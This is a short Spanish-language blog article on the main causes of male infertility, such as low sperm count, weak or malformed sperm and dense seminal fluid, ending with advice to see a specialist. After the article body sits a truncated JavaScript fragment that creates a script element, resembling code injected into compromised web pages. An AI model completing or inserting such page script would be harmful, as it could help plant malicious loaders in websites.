Causas de infertilidad masculina

Por Elizabeth Palacios     @ely__palacios

Durante mucho tiempo se creyó que la infertilidad era un padecimiento exclusivo de las mujeres, sin embargo, en nuestros días ya es claro que esto es un mito, pues la infertilidad puede ser tanto masculina como femenina.

Las mujeres sufrimos de la presión social que nos apresura a embarazarnos a buena edad porque los años nos van quitando probabilidades de fertilidad.

Pero esto no es exclusivo de las mujeres, está científicamente comprobado que los hombres de mayor edad también tienen menos probabilidades de ser fértiles y más problemas en su funcionamiento sexual.

Es por ello que en esta ocasión hablaremos de las principales causas de la infertilidad masculina.

Bajo recuento de espermatozoides

Se refiere a que el hombre produzca poca cantidad de espermatozoides, por lo que al eyacular no sean suficientes para lograr un embarazo.

Esperma débil que no logra llegar al óvulo

Cuando los espermatoziodes son demasiado débiles no logran llegar al óvulo, por lo que, evidentemente no se logra fecundar al óvulo.

Esperma malformado

Cuando existe el problema del esperma malformado se tiene como consecuencia la infertilidad masculina, pues el esperma debe ser sano y fuerte para cumplir con su objetivo de fecundación.

Líquido seminal denso que no permite la movilidad del esperma

Cuando el líquido seminal es demasiado denso, el esperma no tiene buena movilidad, por lo que no logra llegar al óvulo.

Ausencia de esperma

Para que exista la reproducción debe llegar el espermatozoide hasta el óvulo y fecundarlo, por lo que, si no existe esperma, el proceso de gestación no será posible.

Como recomendación, si después de un año de intentar embarazarse no consiguen lograrlo, deben acudir a un médico especialista para que les realice estudios a la pareja para que identifique el problema y se pueda dar el tratamiento necesario.

var d=document;var s=d.createElement(‘script’);

:)